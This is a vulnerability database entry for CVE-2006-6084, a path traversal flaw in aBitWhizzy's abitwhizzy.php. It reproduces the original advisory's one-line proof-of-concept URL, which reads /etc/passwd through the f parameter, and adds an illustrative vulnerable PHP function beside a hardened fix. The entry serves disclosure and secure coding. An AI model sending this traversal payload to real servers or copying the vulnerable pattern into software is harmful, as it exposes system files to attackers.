aBitWhizzy abitwhizzy.php Remote Directory Traversal Information Disclosure Vulnerability

Vulnerability ID: 1111630    Type: Path traversal
Published: 2006-11-21    Updated: 2006-11-28
CVE: CVE-2006-6084    CNNVD-ID: CNNVD-200611-403
Platform: PHP    CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/2823
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-403
|Details
aBitWhizzy is web-based forum software. It contains an input validation flaw that lets a remote attacker read file contents without authorization: the abitwhizzy.php script does not properly sanitize the f parameter, so a request can carry directory-traversal sequences (../) and disclose the contents of any file readable by the web server process, /etc/passwd being the usual proof. The original advisory (reproduced below) labels the bug a "local file include"; if the parameter reaches include()/require() rather than a plain file read, any PHP code in the targeted file would also be executed, which is worse than disclosure alone. The page itself only demonstrates the file-disclosure case.
|Exploit (EXP)
aBitWhizzy [local file include]
vendor site: http://www.unverse.net/abitwhizzy/
product: aBitWhizzy
bug: local file include
global risk : high


http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd


laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-21]
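The following is an added example, not the exploit above and not aBitWhizzy's own source (which this page does not show): a minimal PHP reconstruction of the unsafe pattern the advisory describes, a file read driven by the unchecked f parameter, placed beside a hardened version. The pages/ directory name, the function names and the sample requests are assumptions made for illustration only.

```php
<?php
// Added illustrative example; NOT code from aBitWhizzy. The directory name
// "pages/" and the function names are assumptions for this example.

// --- Vulnerable pattern (illustrative) ---
// Passing the request parameter straight into a file read lets "../"
// segments walk out of the intended directory:
//   abitwhizzy.php?f=../../../../../../../etc/passwd
function serve_vulnerable(string $f): void
{
    readfile(__DIR__ . '/pages/' . $f);
}

// --- Hardened version ---
// 1. Reject NUL bytes: older PHP versions truncated paths at "\0", which was
//    the classic way to strip an appended extension such as ".php".
// 2. Resolve the requested path with realpath(), which collapses "." and
//    ".." segments and follows symlinks, and returns false if the file
//    does not exist.
// 3. Require the resolved path to stay under the base directory. The base
//    is compared with a trailing separator so that "/var/www/pages-private"
//    is not mistaken for a child of "/var/www/pages".
function resolve_page(string $f, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                               // base directory missing
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    if (strpos($f, "\0") !== false) {
        return null;                               // NUL-byte truncation attempt
    }

    $target = realpath($base . $f);
    if ($target === false) {
        return null;                               // no such file (or traversal to nowhere)
    }
    if (strncmp($target, $base, strlen($base)) !== 0) {
        return null;                               // resolved outside the base directory
    }
    return $target;
}

function serve_hardened(string $f): void
{
    $path = resolve_page($f, __DIR__ . '/pages');
    if ($path === null) {
        http_response_code(404);
        echo 'Not found';
        return;
    }
    readfile($path);
}

// Sample requests (constructed for this example):
//   ?f=index.html                          -> served from pages/
//   ?f=../../../../../../../etc/passwd     -> resolves to /etc/passwd, outside base: 404
//   ?f=..%2f..%2fetc%2fpasswd              -> PHP decodes $_GET first, same result: 404
//   ?f=some-symlink-to-etc-passwd          -> realpath follows the link, outside base: 404
$f = $_GET['f'] ?? 'index.html';
serve_hardened($f);
```

Two details are worth noting. First, the prefix comparison must run on the realpath() output, not on the raw string: a check such as "does $f contain ../" is easy to bypass with encodings and misses symlinks, whereas comparing the canonical path catches both. Second, because realpath() returns false for files that do not exist, the check-then-read sequence cannot be used to probe for the existence of files outside the base directory; the 404 response is the same for "missing" and "forbidden". Where the set of servable pages is small and fixed, an explicit allowlist of names is simpler still and avoids the path logic entirely.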
|References

Source: XF
Name: abitwhizzy-abitwhizzy-file-include (30458)
Link: http://xforce.iss.net/xforce/xfdb/30458
Source: BID
Name: 21222
Link: http://www.securityfocus.com/bid/21222
Source: BUGTRAQ
Name: 20061121 aBitWhizzy [local file include]
Link: http://www.securityfocus.com/archive/1/archive/1/452235/100/0/threaded
Source: VUPEN
Name: ADV-2006-4657
Link: http://www.frsirt.com/english/advisories/2006/4657
Source: SECTRACK
Name: 1017266
Link: http://securitytracker.com/id?1017266
Source: SECUNIA
Name: 23055
Link: http://secunia.com/advisories/23055
Source: MISC
Link: http://s-a-p.ca/index.php?page=OurAdvisories&id=52
Source: www.unverse.net
Link: http://www.unverse.net/abitwhizzy-forum/0611251408/
Source: BUGTRAQ
Name: 20061204 Re: aBitWhizzy [local file include]
Link: http://www.securityfocus.com/archive/1/archive/1/453478/100/0/threaded